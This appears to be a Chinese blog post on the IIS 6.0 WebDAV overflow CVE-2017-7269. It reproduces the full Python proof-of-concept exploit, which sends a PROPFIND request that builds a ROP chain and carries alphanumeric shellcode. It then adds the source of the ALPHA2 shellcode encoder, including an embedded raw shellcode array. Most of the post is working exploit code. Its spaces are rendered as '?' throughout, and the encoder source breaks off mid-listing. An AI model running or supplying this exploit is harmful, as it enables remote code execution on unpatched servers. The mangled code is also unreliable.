IIS6.0 CVE-2017-7269

IIS/6.0 MS-Author-Via: DAV


原POC:

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.

#written?by?Zhiniang?Peng?and?Chen?Wu.?Information?Security?Lab?&?School?of?Computer?Science?&?Engineering,?South?China?University?of?Technology?Guangzhou,?China

#-----------Email:?edwardz@foxmail.com

importsocket

sock?=?socket.socket(socket.AF_INET,?socket.SOCK_STREAM)

sock.connect(('127.0.0.1',80))

pay='PROPFIND?/?HTTP/1.1\r\nHost:?localhost\r\nContent-Length:?0\r\n'

pay+='If:?

pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

pay+='>'

pay+='?(Not?)?

pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'

pay+=shellcode

pay+='>\r\n\r\n'

print?pay

sock.send(pay)

data?=?sock.recv(80960)

print?data

sock.close



了解過pwn的都知道從找到溢出到執行shellcode一般需要一段ROP調用鏈才能跳轉到shellcode執行,作者代碼中的shellcode變量很明顯告訴我門這是關鍵的執行代碼,也就是計算器的執行代碼,前面的都是溢出和ROP鏈的一部分。

而poc中的這段shellcode全部是字母和數字組合,應該是使用了ALPHA系列的shellcode編碼器。

找到修改后的ALPHA 2代碼如下,可通過vs2015的編譯生成exe。



// Alpha2.cpp : Defines the entry point for the console application.

//

#include // printf(), fprintf(), stderr

#include // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()

#include // strcasecmp(), strstr()

#include //struct timeval, struct timezone, gettimeofday()

#include

#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"

#define COPYRIGHT? ? ? "Copyright (C) 2003, 2004 by Berend-Jan Wever."

/*

________________________________________________________________________________

,sSSs,,s,? ,sSSSs,? ALPHA 2: Zero-tolerance.

SS"? Y$P"? SY"? ,SY

iS'? dY? ? ? ,sS"? Unicode-proof uppercase alphanumeric shellcode encoding.

YS,? dSb? ? ,sY"? ? ? Copyright (C) 2003, 2004 by Berend-Jan Wever.

`"YSS'"S' 'SSSSSSSP?

________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under

the terms of the GNU General Public License version 2, 1991 as published by

the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT

ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS

FOR A PARTICULAR PURPOSE.? See the GNU General Public License for more

details.

A copy of the GNU General Public License can be found at:

http://www.gnu.org/licenses/gpl.html

or you can write to:

Free Software Foundation, Inc.

59 Temple Place - Suite 330

Boston, MA? 02111-1307

USA.

Acknowledgements:

Thanks to rix for his phrack article on aphanumeric shellcode.

Thanks to obscou for his phrack article on unicode-proof shellcode.

Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.

*/

#define mixedcase_w32sehgetpc? ? ? ? ? "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36"\

"FFFFTXVj0PPTUPPa301089"

#define uppercase_w32sehgetpc? ? ? ? ? "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" \

"P5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618" \

"16"

#define mixedcase_ascii_decoder_body? ? "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"

#define uppercase_ascii_decoder_body? ? "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" \

"BXP8ACJJI"

#define mixedcase_unicode_decoder_body? "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" \

"IAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" \

"ZBABABABABkMAGB9u4JB"

#define uppercase_unicode_decoder_body? "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" \

"AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" \

"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB3" \

"0APB944JB"

struct decoder {

char* id; // id of option

char* code; // the decoder

} mixedcase_ascii_decoders[] = {

{ "nops",? ? "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },

{ "eax",? ? ? "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "ecx",? ? ? "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "edx",? ? ? "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },

{ "ebx",? ? ? "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "esp",? ? ? "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "ebp",? ? ? "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "esi",? ? ? "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "edi",? ? ? "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp-C]",? "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp-8]",? "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp-4]",? "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp]",? ? "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+4]",? "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp+8]",? "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+C]",? "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "seh",? ? ? mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code

mixedcase_ascii_decoder_body },

{ NULL, NULL }

}, uppercase_ascii_decoders[] = {

{ "nops",? ? "IIIIIIIIIIII" uppercase_ascii_decoder_body },

{ "eax",? ? ? "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "ecx",? ? ? "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "edx",? ? ? "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },

{ "ebx",? ? ? "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "esp",? ? ? "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "ebp",? ? ? "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "esi",? ? ? "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "edi",? ? ? "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },

{ "[esp-C]",? "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp-8]",? "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp-4]",? "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp]",? ? "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+4]",? "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp+8]",? "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+C]",? "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "seh",? ? ? uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code

uppercase_ascii_decoder_body },

{ NULL, NULL }

}, mixedcase_ascii_nocompress_decoders[] = {

{ "nops",? ? "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },

{ "eax",? ? ? "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "ecx",? ? ? "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "edx",? ? ? "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },

{ "ebx",? ? ? "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "esp",? ? ? "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "ebp",? ? ? "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "esi",? ? ? "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "edi",? ? ? "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-C]",? "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-8]",? "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-4]",? "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp]",? ? "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+4]",? "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+8]",? "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+C]",? "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "seh",? ? ? mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code

mixedcase_ascii_decoder_body },

{ NULL, NULL }

}, uppercase_ascii_nocompress_decoders[] = {

{ "nops",? ? "777777777777777777777777" uppercase_ascii_decoder_body },

{ "eax",? ? ? "PY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "ecx",? ? ? "7777777777777777777777QZ" uppercase_ascii_decoder_body },

{ "edx",? ? ? "7777777777777777777777RY" uppercase_ascii_decoder_body },

{ "ebx",? ? ? "SY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "esp",? ? ? "TY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "ebp",? ? ? "UY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "esi",? ? ? "VY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "edi",? ? ? "WY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },

{ "[esp-C]",? "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },

{ "[esp-8]",? "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp-4]",? "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp]",? ? "Y777777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+4]",? "YY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+8]",? "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+C]",? "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },

{ "seh",? ? ? uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code

uppercase_ascii_decoder_body },

{ NULL, NULL }

}, mixedcase_unicode_decoders[] = {

{ "nops",? ? "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },

{ "eax",? ? ? "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "ecx",? ? ? "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },

{ "edx",? ? ? "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "ebx",? ? ? "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "esp",? ? ? "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "ebp",? ? ? "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "esi",? ? ? "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "edi",? ? ? "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "[esp]",? ? "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },

{ "[esp+4]",? "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ NULL, NULL }

}, uppercase_unicode_decoders[] = {

{ "nops",? ? "IAIAIAIA4444" uppercase_unicode_decoder_body },

{ "eax",? ? ? "PPYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "ecx",? ? ? "IAIAIAIA4444" uppercase_unicode_decoder_body },

{ "edx",? ? ? "RRYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "ebx",? ? ? "SSYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "esp",? ? ? "TUYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "ebp",? ? ? "UUYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "esi",? ? ? "VVYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "edi",? ? ? "WWYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "[esp]",? ? "YAIAIAIAIA44" uppercase_unicode_decoder_body },

{ "[esp+4]",? "YUYAIAIAIAIA" uppercase_unicode_decoder_body },

{ NULL, NULL }

}, mixedcase_unicode_nocompress_decoders[] = {

{ "nops",? ? "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "eax",? ? ? "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "ecx",? ? ? "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "edx",? ? ? "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "ebx",? ? ? "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "esp",? ? ? "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "ebp",? ? ? "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "esi",? ? ? "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "edi",? ? ? "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "[esp]",? ? "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "[esp+4]",? "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ NULL, NULL }

}, uppercase_unicode_nocompress_decoders[] = {

{ "nops",? ? "44444444444444" uppercase_unicode_decoder_body },

{ "eax",? ? ? "PPYA4444444444" uppercase_unicode_decoder_body },

{ "ecx",? ? ? "44444444444444" uppercase_unicode_decoder_body },

{ "edx",? ? ? "RRYA4444444444" uppercase_unicode_decoder_body },

{ "ebx",? ? ? "SSYA4444444444" uppercase_unicode_decoder_body },

{ "esp",? ? ? "TUYA4444444444" uppercase_unicode_decoder_body },

{ "ebp",? ? ? "UUYA4444444444" uppercase_unicode_decoder_body },

{ "esi",? ? ? "VVYA4444444444" uppercase_unicode_decoder_body },

{ "edi",? ? ? "WWYA4444444444" uppercase_unicode_decoder_body },

{ "[esp]",? ? "YA444444444444" uppercase_unicode_decoder_body },

{ "[esp+4]",? "YUYA4444444444" uppercase_unicode_decoder_body },

{ NULL, NULL }

};

struct decoder* decoders[] = {

mixedcase_ascii_decoders, uppercase_ascii_decoders,

mixedcase_unicode_decoders, uppercase_unicode_decoders,

mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,

mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders

};

unsigned char evil[] =

"\xda\xd1\xd9\x74\x24\xf4\x58\xba\x05\xf6\xdf\x74\x29\xc9\xb1"

"\x31\x83\xc0\x04\x31\x50\x14\x03\x50\x11\x14\x2a\x88\xf1\x5a"

"\xd5\x71\x01\x3b\x5f\x94\x30\x7b\x3b\xdc\x62\x4b\x4f\xb0\x8e"

"\x20\x1d\x21\x05\x44\x8a\x46\xae\xe3\xec\x69\x2f\x5f\xcc\xe8"

"\xb3\xa2\x01\xcb\x8a\x6c\x54\x0a\xcb\x91\x95\x5e\x84\xde\x08"

"\x4f\xa1\xab\x90\xe4\xf9\x3a\x91\x19\x49\x3c\xb0\x8f\xc2\x67"

"\x12\x31\x07\x1c\x1b\x29\x44\x19\xd5\xc2\xbe\xd5\xe4\x02\x8f"

"\x16\x4a\x6b\x20\xe5\x92\xab\x86\x16\xe1\xc5\xf5\xab\xf2\x11"

"\x84\x77\x76\x82\x2e\xf3\x20\x6e\xcf\xd0\xb7\xe5\xc3\x9d\xbc"

"\xa2\xc7\x20\x10\xd9\xf3\xa9\x97\x0e\x72\xe9\xb3\x8a\xdf\xa9"

"\xda\x8b\x85\x1c\xe2\xcc\x66\xc0\x46\x86\x8a\x15\xfb\xc5\xc0"

"\xe8\x89\x73\xa6\xeb\x91\x7b\x96\x83\xa0\xf0\x79\xd3\x3c\xd3"

"\x3e\x2b\x77\x7e\x16\xa4\xde\xea\x2b\xa9\xe0\xc0\x6f\xd4\x62"

"\xe1\x0f\x23\x7a\x80\x0a\x6f\x3c\x78\x66\xe0\xa9\x7e\xd5\x01"

"\xf8\x1c\xb8\x91\x60\xcd\x5f\x12\x02\x11";

void version(void) {

printf(

"________________________________________________________________________________\n"

"\n"

"? ? ,sSSs,,s,? ,sSSSs,? " VERSION_STRING "\n"

"? SS\"? Y$P\"? SY\"? ,SY \n"

"? iS'? dY? ? ? ,sS\"? Unicode-proof uppercase alphanumeric shellcode encoding.\n"

"? YS,? dSb? ? ,sY\"? ? ? " COPYRIGHT "\n"

"? `\"YSS'\"S' 'SSSSSSSP? \n"

"________________________________________________________________________________\n"

"\n"

);

exit(EXIT_SUCCESS);

}

void help(char* name)

{

printf(

"Usage: %s [OPTION] [BASEADDRESS]\n"

"ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.\n"

"The result can optionaly be uppercase-only and/or unicode proof. It is a encoded\n"

"version of your origional shellcode. It consists of baseaddress-code with some\n"

"padding, a decoder routine and the encoded origional shellcode. This will work\n"

"for any target OS. The resulting shellcode needs to have RWE-access to modify\n"

"it's own code and decode the origional shellcode in memory.\n"

"\n"

"BASEADDRESS\n"

"? The decoder routine needs have it's baseaddress in specified register(s). The\n"

"? baseaddress-code copies the baseaddress from the given register or stack\n"

"? location into the apropriate registers.\n"

"eax, ecx, edx, ecx, esp, ebp, esi, edi\n"

"? Take the baseaddress from the given register. (Unicode baseaddress code using\n"

"? esp will overwrite the byte of memory pointed to by ebp!)\n"

"[esp], [esp-X], [esp+X]\n"

"? Take the baseaddress from the stack.\n"

"seh\n"

"? The windows \"Structured Exception Handler\" (seh) can be used to calculate\n"

"? the baseaddress automatically on win32 systems. This option is not available\n"

"? for unicode-proof shellcodes and the uppercase version isn't 100%% reliable.\n"

"nops\n"

"? No baseaddress-code, just padding.? If you need to get the baseaddress from a\n"

"? source not on the list use this option (combined with --nocompress) and\n"

"? replace the nops with your own code. The ascii decoder needs the baseaddress\n"

"? in registers ecx and edx, the unicode-proof decoder only in ecx.\n"

"-n\n"

"? Do not output a trailing newline after the shellcode.\n"

"--nocompress\n"

"? The baseaddress-code uses \"dec\"-instructions to lower the required padding\n"

"? length. The unicode-proof code will overwrite some bytes in front of the\n"

"? shellcode as a result. Use this option if you do not want the \"dec\"-s.\n"

"--unicode\n"

"? Make shellcode unicode-proof. This means it will only work when it gets\n"

"? converted to unicode (inserting a '0' after each byte) before it gets\n"

"? executed.\n"

"--uppercase\n"

"? Make shellcode 100%% uppercase characters, uses a few more bytes then\n"

"? mixedcase shellcodes.\n"

"--sources\n"

"? Output a list of BASEADDRESS options for the given combination of --uppercase\n"

"? and --unicode.\n"

"--help\n"

"? Display this help and exit\n"

"--version\n"

"? Output version information and exit\n"

"\n"

"See the source-files for further details and copying conditions. There is NO\n"

"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"

"\n"

"Acknowledgements:\n"

"? Thanks to rix for his phrack article on aphanumeric shellcode.\n"

"? Thanks to obscou for his phrack article on unicode-proof shellcode.\n"

